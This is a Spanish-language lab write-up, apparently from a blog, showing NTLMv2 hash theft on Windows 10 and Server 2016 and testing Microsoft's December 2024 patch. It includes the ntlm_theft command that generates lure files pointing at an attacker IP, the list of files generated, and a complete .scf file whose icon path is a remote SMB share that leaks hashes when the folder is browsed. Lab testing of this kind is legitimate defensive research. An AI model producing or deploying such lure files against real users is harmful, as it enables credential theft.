Post

NTLMv2 Hashes Steal

NTLMv2 Hashes Steal

Demostrar de manera práctica el funcionamiento del robo de hashes NTLMv2, mediante el uso de archivos modificados. Además, evaluaremos la efectividad del parche de seguridad lanzado por Microsoft en diciembre de 2024 para mitigar esta vulnerabilidad.

Figura 1

Herramientas Utilizadas

  • Responder: Permite interceptar y manipular solicitudes de autenticación en redes Windows.
  • ntlm_theft: Genera archivos modificados que envían credenciales NTLM al atacante.

Uso básico:

1
python3 ntlm_theft.py -g modern -s 192.168.1.11 -f Important

Figura 2

Archivos Generados

1
2
3
4
5
6
7
8
9
10
ls
Important-(externalcell).xlsx  Important-(icon).url
Important-(stylesheet).xml     Important.asx
Important.lnk                  Important.rtf
Important-(frameset).docx      Important-(includepicture).docx
Important-(url).url            Important.htm
Important.m3u                  Important.wax
Important-(fulldocx).xml       Important-(remotetemplate).docx
Important.application          Important.jnlp
Important.pdf

Configuración del Entorno

Compartimos el archivo Excel con la máquina víctima y ejecutamos Responder en la máquina atacante.

Figura 3

Figura 4

Figura 5

Aplicación del Parche

Se aplicó el parche lanzado por Microsoft en diciembre de 2024 para Windows 10.

Figura 6

Al probar nuevamente, la vulnerabilidad persiste al abrir el archivo Excel.

Figura 7

Windows Server 2016

En Windows Server 2016 probamos un archivo que no requiere ser abierto para explotar la vulnerabilidad.

1
2
3
4
5
[Shell]
Command=2
IconFile=\\192.168.1.11\tools\nc.ico
[Taskbar]
Command=ToggleDesktop

Figura 8

Simplemente al acceder a la ruta del archivo, se capturan los hashes correspondientes.

Figura 9

Figura 10

Instalación del Parche

Al intentar instalar manualmente el parche, se detecta que no es aplicable a Windows Server 2016.

Figura 11

Figura 12

Conclusión del Laboratorio

Este laboratorio demostró que:

  1. En Windows 10, incluso tras aplicar el parche, se pueden capturar hashes NTLM abriendo archivos modificados.
  2. En Windows Server 2016, la vulnerabilidad persiste sin necesidad de abrir el archivo, y los parches de seguridad no son aplicables.

Esto resalta la importancia de evaluar constantemente las mitigaciones en entornos vulnerables.

Figura 13

Figura 14

Figura 15

This post is licensed under CC BY 4.0 by the author.